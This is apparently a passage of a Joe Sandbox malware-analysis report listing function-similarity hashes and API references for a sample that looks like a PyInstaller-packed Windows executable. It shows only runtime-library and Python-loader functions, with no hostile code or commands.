                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction ID: 03150745851d9494dfba7d3a81df21f2f884b34cb97f6064eefa8bbd481ea127
                                                              • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction Fuzzy Hash: 4C419E36D0820387EB34DA15E55127E73A0EB59B88F140231DAAEC76E1EF2CF502CB51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                              • Instruction ID: 2c77d70b92bd71451f16a1fa1d91d6df9601d3ce8bf72cc8eeb6b4d1f6a0d6f3
                                                              • Opcode Fuzzy Hash: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                              • Instruction Fuzzy Hash: CD216F21F0865345FB10EA56A9083BAA641BF4DBD8F884430EE2D96BD6EE7DF046C600
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                              • Instruction ID: 584010f172b4cbb649e79453ea2faef52475fdc500b6b1be7d19eacbab0c1be0
                                                              • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                              • Instruction Fuzzy Hash: B431C122E2865386F711EB1588413BD2660AF58BA9F520235DA7DC33F2EFBCE491C710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                              • Instruction ID: 595207c17adf287fa3ad07948474392b2cf23d9c41038d4fc3988ac5d0a9e9f8
                                                              • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                              • Instruction Fuzzy Hash: AA217832E15B06CAEB64DFA4C4442EC33A0FB4871CF54463AD62D86AE9EF38D584DB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction ID: 18c1d2ee62bbe6ac451d10a3cebda90465851a5b82d96694ff170bbc2f223e22
                                                              • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction Fuzzy Hash: EE119621E1D643C1EB60EF51D41017EA6A4BF99B88F444131EA6CD76E6EF3CE551C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction ID: 35c5d3a66de5790085d571a04a69aeacc9efa8447fc38a01dc92675fdc2eda2f
                                                              • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction Fuzzy Hash: 0C218732A18A8386EB658F18D59037976A0EB9CBD4F145234D66DC76F9EF3DD441CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction ID: 4c7fb3b905a1547dee916c8baf13a20a6da47b09726325c44894966dd1d14d2e
                                                              • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction Fuzzy Hash: A601A121E0878340FB04DB56990106DA795EB99FE8F484631DE7C97BE6EE3CE512C300
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FB1FA63A,?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A), ref: 00007FF6FB1FDEFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                              • Instruction ID: 291bb6fbc11986cc3b9581f3b0e00c7d10fde55975d0aaef95bb837f310cc3c8
                                                              • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                              • Instruction Fuzzy Hash: 06F09005F0924B80FF58E76699253B522915F9CB88F4C5430C92EC63F2FE2CE482C250
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6FB1EFFB0,?,?,?,00007FF6FB1F161A,?,?,?,?,?,00007FF6FB1F2E09), ref: 00007FF6FB1FC94A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction ID: ee4ed4447ee058291ce304c9d2ea37237cb2e6f2edecaf518085abdf680383f6
                                                              • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction Fuzzy Hash: BDF05E00F1824744FF28A66169112791280AF9C7A8F084630D83EC5AE5FE1CE541E210
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E50C0
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5101
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5126
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E514B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5173
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E519B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51C3
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51EB
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 190572456-2007157414
                                                              • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction ID: 64fc361415386140762d15d431bcb8a047f2fe96515796d1914d3aec1433a503
                                                              • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction Fuzzy Hash: 521264A4D1DB0395FB65DB08AAB41B822A1AF4C794F946435D83ED2AF0FF7CB5488340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                              • Instruction ID: a4e7d4496f675aa15f03d4430863fdbe56adf9e781005a3b936fe920968052ee
                                                              • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                              • Instruction Fuzzy Hash: D6B2B672A182834BE7658E65D6A07FD77A1FB5C3C8F406135DA29D7AE4EF38A500CB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                              • API String ID: 0-2665694366
                                                              • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                              • Instruction ID: ba4aea02f65fb1e4daca20faf5ce1ee6bfae4e5019a4699c8f4dfbfcb8670a5b
                                                              • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                              • Instruction Fuzzy Hash: B252B372E146A68BD754CF14C458B7E3BA9EB88344F054239EA5A87BD0EF3DE944CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction ID: 5407e1aa73fb103a69951b37a3210641d96a59a2e985b166c36ad19798042dac
                                                              • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction Fuzzy Hash: 02315276A08B8289EB60CF64E8543FE7364FB48748F445039DA5E87BA5EF38D548C710
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFormatLast
                                                              • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                              • API String ID: 3971115935-1149178304
                                                              • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                              • Instruction ID: 4482e84b6ad5bf65a74e22d03059101e436914d5d6b236a7b2aded1bae0be53d
                                                              • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                              • Instruction Fuzzy Hash: A5212176618A8682E730DB10F5546EE6364FB8C7C8F400136EA9D93AA8EF7CD5568740
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F55
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                                • Part of subcall function 00007FF6FB1F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C19
                                                                • Part of subcall function 00007FF6FB1F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C3E
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F44
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 1458651798-0
                                                              • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                              • Instruction ID: f639b0aa5e08c4bbfd391599fb3a6491ca6d7af74d319029684dea07566e0757
                                                              • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                              • Instruction Fuzzy Hash: C4D1A026E1824386E720EF25DAA01B963A1EF4C7D4F44A535EA2DC7AE5FE3CE441C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction ID: e30b4200656ae975394dda14665093425b56bd2c92e8d4d1f2032a7fcbb2e710
                                                              • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction Fuzzy Hash: 66317636A08B8285D760DF25E8542BE73A4FB8C798F541135EAAD87BA9EF3CD145C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                              • Instruction ID: d122b4eb2813cd70ffce6843a5c107e519c131e620da343c94caa06004dd2823
                                                              • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                              • Instruction Fuzzy Hash: D3B19621B1869B41FB60DB21D6245BA6291EB58BE4F446132EA6DD7BEDFF3CE441C300
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
